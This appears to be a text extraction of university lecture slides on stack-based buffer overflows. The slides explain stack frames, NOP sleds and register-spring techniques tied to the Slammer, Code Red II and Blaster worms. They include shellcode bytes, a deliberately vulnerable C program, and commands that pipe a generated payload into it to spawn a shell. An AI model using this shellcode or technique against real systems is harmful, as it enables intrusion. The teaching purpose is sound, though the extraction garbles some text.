ch5 buffer overflow concept

8/9/2019 Ch5 Buffer Overflow Concept

1/69

Buffer Overflow

Attack Concept


2/69

Outline

Background

Basic Concept

Attack Flow NOP technique

Attack Example: Slammer

2


3/69

3

Essential attack method

Try a web search for buffer overflow exploit.

Check alt.2600, rootshell.com, antionline.com

you can find long lists ofexploits based on bufferoverflow.

Even the original version of ssh had a problem!

(after they made a big deal that there were nobuffer overflow problems in their code).


4/69

4

The Problem

void foo(char *s) {

char buf[10];

strcpy(buf,s);

printf(buf is %s\n,s);

}

foo(thisstringistolongforfoo);


5/69

5

Exploitation

The general idea is to give programs (servers) verylarge strings that will overflow a buffer.

For a server with sloppy code its easy to crashthe server by overflowing a buffer (SEGVtypically).

Its sometimes possible to actually make theserver do whatever you want (instead ofcrashing).


6/69

Buffer OverflowSome unsafe functions in C library:strcpy(char *dest, const char *src);

strcat(char *dest, const char *src);

getwd(char *buf);

gets(char *s);

fscanf(FILE *stream, const char *format, ...);

scanf(const char *format, ...);realpath(char *path, char resolved_path[]);

sprintf(char *str, const char *format);

6

No

Verification


7/69

7

Background Necessary

C functions and the stack.

A little knowledge of assembly/machine

language. How system calls are made (at the level of

machine code level).

exec() system calls

How to guess some key parameters.


8/69

8

CPU/OS dependency

Building an exploit requires knowledge of the

specific CPU and operating system of the

target.

Ill just talk about x86 and Linux, but the

methods work for other CPUs and OSs.

Some details are very different, but the

concepts are the same.


9/69

Outline

Background

Basic Concept

Attack Flow

NOP technique


9


10/69

10

C Call Stack

When a function call is made, the return

address is put on the stack.

Often the values of parameters are put on thestack.

Usually the function saves the stack frame

pointer (on the stack).

Local variables are on the stack.


11/69

11


12/69

Stack

12


13/69

13

High

Low

Stack

Growth

String

Growth

Arguments

Return address

Prev. frame pointer

Local variables

Stack

Pointer


14/69

14

Stack Direction

On Linux (x86) the stack grows from high

addresses to low.

Pushing something on the stack moves the

Top Of Stack towards the address 0.


15/69

15

Parameters

Return AddressCalling Frame Pointer

Local Variables

A Stack Frame

00000000

Addresses

SP

SP+offset


16/69

16

Sample

Stack

18

addressof(y=3) return address

saved stack pointer

y

x

buf

x=2;

foo(18);

y=3;

void foo(int j) {

int x,y;

char buf[100];

x=j;

}


17/69

17

Smashing the Stack*

The general idea is to overflow a buffer so

that it overwrites the return address.

When the function is done it will jump towhatever address is on the stack.

We put some code in the buffer and set the

return address to point to it!


18/69

18

Before and After

void foo(char *s) {

char buf[100];

strcpy(buf,s);

address ofs

return-address

saved sp

buf

address ofs

pointer to pgm

Small Program


19/69

19

High

Low

Stack

Growth

String

Growth

Arguments

Return address

Prev. frame pointer

Local variables

Stack

Pointer


20/69

20

High

Low

Stack

Growth

String

Growth

Arguments

Return address

Prev. frame pointer

Local variables

Stack

Pointer

bar( )

{}

foo( )

{

call bar( );

}

foo

bar


21/69

21

int bar(int a, int b){

int i, j;char buf[9];

i = 5;j = 123;strcpy(buf, securephdbcde);

}

b

a

high

low

ret address

SFP

05 00 00 00

65 00 00 00

64 62 63 64

72 65 70 68

73 65 63 75Buffer Overflow

5

e

d b c d

r e p h

s e c u


22/69

22

int bar(int a, int b){

int i, j;char buf[9];

i = 5;j = 123;strcpy(buf,

securephdaaabbbbcccceeeeffff);}

b

a

high

low

ret address

SFP5

123

63 63 63 63

62 62 62 62

64 61 61 61

72 65 70 6873 65 63 75

65 65 65 65

64 64 64 64

Ret Overflow

Segmentation fault...

RetAddr = 0x65656565


23/69

23

High

Low

Stack

Growth

String

Growth

Arguments

Return address

Prev. frame pointer

Local variables

Stack

Pointer

bar( )

{}

foo( )

{

call bar( );

}

foo

bar


24/69

24

High

Low

Stack

Growth

String

Growth

Arguments

Return address

Prev. frame pointer

Local variables

Stack

Pointer

bar( )

{}

foo( )

{

call bar( );

}

foo

bar


25/69

Outline

Background

Basic Concept

Attack Flow

NOP technique


25


26/69

Control Flow Hijack

I want my code executed!

Malicious code injection

Control flow redirection/hijacking

26

code code

codecode

Virus

Worm


27/69

A Single Packet Exploit

27

Attack CodeExploit

(ReturnAddr)

Return Address == 0x4739a304


28/69

28

Issues

How do we know what value the pointer

should have (the new return address).

Its the address of the buffer, but how do we know

what address this is?

How do we build the small program and put

it in a string?


29/69

29

Guessing Addresses

Typically you need the source code so you can

estimate the address of both the buffer and

the return-address.

An estimate is often good enough! (more on

this in a bit).


30/69

30

Building the

small program

Typically, the small program stuffed in to the

buffer does anexe

c().

Sometimes it changes the password db or

other files


31/69

31

exec()

In Unix, the way to run a new program is withthe exec() system call.

There is actually afamilyofexec() system

calls This doesn't create a new process, it changes the

current process to a new program.

To create a new process you need something else

( fork() ).


32/69

32

exec() example

#include

char *args[] = {"/bin/ls", NULL};

voidexecls(void) {

execv("/bin/ls",args);

printf(Im not printed\n");

}


33/69

33

Generating a String

You can take code like the previous slide, and

generate machine language.

Copy down the individual byte values andbuild a string.

To do a simple exec requires less than 100

bytes.


34/69

34

A Sample Program/String

Does an exec() of /bin/ls:

unsigned char cde[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0

\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c

\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/ls";


35/69

35

Some important issues

The small program should be position-

independent able to run at any memory

location.

It cant be too large, or we cant fit the

program and the new return-address on the

stack!


36/69

36

Sample Overflow Programunsigned char cde[] = "\xeb\x1f\

void tst(void) {

int *ret;

ret = (int *)&ret+2; // pointer arith!

(*ret) = (int) cde; //change ret addr}

int main(void) {

printf("Running tst\n");tst();

printf("foo returned\n");

}


37/69

37

Attacking a real program

Recall that the idea is to feed a server a string

that is too big for a buffer.

T

his string overflows the buffer and overwritesthe return address on the stack.

Assuming we put our small program in the

string, we need to know its address.


38/69

Outline

Background

Basic Concept



38


39/69

39

NOPs

Most CPUs have a No-Operation instruction

it does nothing but advance the instruction

pointer.

Usually we can put a bunch of these ahead of

our program (in the string).

As long as the new return-address points to a

NOP we are OK.


40/69

40

0000000 9090 9090 9090 9090 9090 9090 9090 9090

*

00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031

0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03

0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962

0000220 2f6e 6873 f822 bfff f822 bfff f822 bfff

0000230 f822 bfff f822 bfff f822 bfff f822 bfff

*

00004a0 f822 bfff f822 bfff f822 bfff 9090 9090

00004b0 fa48 bfff

Example


41/69

41

0000000 9090 9090 9090 9090 9090 9090 9090 9090

*

00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031

0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03

0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962



*


00004b0 fa48 bfff

Example: NOP-sled

Sometime we can not easily determine the exact

memory address to jump into


42/69

NOP Sled Engineering

42

Attack CodeExploit

(ReturnAddr)

Attack CodeExploit

(ReturnAddr)

NOP NOP

NOP NOP

code[] = \xeb\x2a\x5f\xc6\x47\x07\x00\x89\x7f\x08\xc7\x47;

strcpy(buf, code);

buf = \xeb\x2a\x5f\xc6\x47\x07

And, sometimes, we simply want to find a way to avoid \x00.


43/69

Detecting NOP Sleds

Intrusion Prevention Systems or Advanced

Firewalls

43

IntrusionPreventionSystem

Legacy

victims

packet packet

analyze &drop

NOP Sled

Signatures


44/69

attack polymorphism

(many different ways)

44

Attack CodeExploit

(ReturnAddr)

Attack CodeExploit

(ReturnAddr)

Decryption

Code

The Signature Explosion Problem!!


45/69

45

0000000 9090 9090 9090 9090 9090 9090 9090 9090

*

00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031

0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03

0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962



*


00004b0 fa48 bfff

A WORM with a NOP-Sled


46/69

NOP sleds

NOP sled can/will NOT be a useful signature

in detecting future WORMs

80~90% of the WORMs today dont really

need NOP sleds but, historically, they are

still left there.

46


47/69

Memory Address Ranges

47

Arguments

Return address

Prev. frame pointer

Local variables

Arguments

Return address

Prev. frame pointer

Local variables

One Exploithas one return address value, but anotherexploit based on the same vulnerability might be using a

different return address.


48/69

48

Using NOPs

Real program(exec /bin/ls or whatever)

new return address

nop instructions


49/69

49

Estimating the stack size

We can also guess at the location of the return

address relative to the overflowed buffer.

Put in a bunch of new return addresses!


50/69

50

Estimating the Location

Real program

new return address

nop instructions

new return address

new return addressnew return address

new return addressnew return address


51/69

51

vulnerable.c

void foo( char *s ) {char name[200];

strcpy(name,s);

printf("Name is %s\n",name);

}int main(void) {

char buf[2000];

read(0,buf,2000);

foo(buf);

}


52/69

52

genpgm.c

genpgm.c was constructed to exploit the

buffer overflow in vulnerable.c

It allows he user to add an offset to a fixed

guess of the address of the return-

address on the stack.

It writes (to stdout) a string that contains a

bunch of return-addresses and a programthat does: exec /bin/ls.


53/69

53

Testing

./genpgm 16 | ./vulnerable

Get ambitious! Change the program output bygenpgm to exec /bin/sh!

(./genpgm; cat) | ./vulnerable


54/69

54

IPUPR. LYR. PAYLOAD TCP/UDP HDRAttack CodeExploit

(ReturnAddr)

Decryption

Code

NOP NOP

NOP NOP System State Changes

How can each of

the stages be

polymorphic?


55/69

DEMOSTRATIONOFBUFFEROVERFLOW

http://www.youtube.com/watch?v=ZZ0LVAFIDrA

55


56/69

Outline

Background

Basic Concept



56


57/69

Attack technique

ESP

Stack Pointer

jmp ESP

Use ESP register to record attack code execution

address:

EBP

Stack Base

57


58/69

58

High

Low

Stack

Growth

Arguments

Return address

Prev. frame pointer

Local variables

Stack

Pointer

jmp ESP

foo

barret

11,000


59/69

Attack flow

59

Start:

CALL FunctionWithBufferOverflow

FunctionWithBuffe

rOve

rflow:PUSH EBP

MOV EBP,ESP

CALL OverflowMyBuffer

POP EBP

RET


60/69

60

Start:


FunctionWithBufferOverflow:

PUSH EBP

MOV EBP,ESP


POP EBP

RET

ESP


61/69

Start+6

61

Start:



PUSH EBP

MOV EBP,ESP


POP EBP

RET

ESP

Return

address


62/69

Start+6

Old EBP

62

Start:



PUSH EBP

MOV EBP,ESP


POP EBP

RET

ESP

Return

address

Old EBP


63/69

Start+6

Old EBP

63

Start:



PUSH EBP

MOV EBP,ESP


POP EBP

RET

ESP/EBP

MyB

uffer

Return

address

Old EBP


64/69

Attack8

Attack7

Attack6

Attack5

Attack4

Attack3

Attack2

Attack1

Attack0

64

Start:



PUSH EBP

MOV EBP,ESP


POP EBPRET

ESP/EBP

MyB

uffer

Return

address

Old EBP


65/69

Attack8

Attack7

Attack6

Attack5

Attack4

Attack3

Attack2

Attack1

Attack0

65

Start:



PUSH EBP

MOV EBP,ESP


POP EBPRET

ESP

MyBuffer

(EBP == Attack5)

code

jmp ESP

Return

address


66/69

Results

This is how Slammer worked, Sasser is very

similar, as are a couple of others

Bogus return pointer is Attack6, payload starts

at Attack7

66


67/69

Jump to other registers

EBX

base register of indexing the buffer base

Code Red II , Blaster RPC DCOM used EBX

JMP EBX :0xff 0xd3=> 0x0100139d

EDI

destination register for string operations

ASN.1 uses EDI

67


68/69

68

High

Low

Stack

Growth

Arguments

Return address

Prev. frame pointer

Local variables

Stack

Pointer

jmp ESP

foo

barret

jmp EBX


69/69

Register Spring+Polymorphic

Attack Code Exploit(RegisterSpring)

DecryptionCode

NOP NOPNOP NOP

????

0x0100139d

ch5 buffer overflow concept

Documents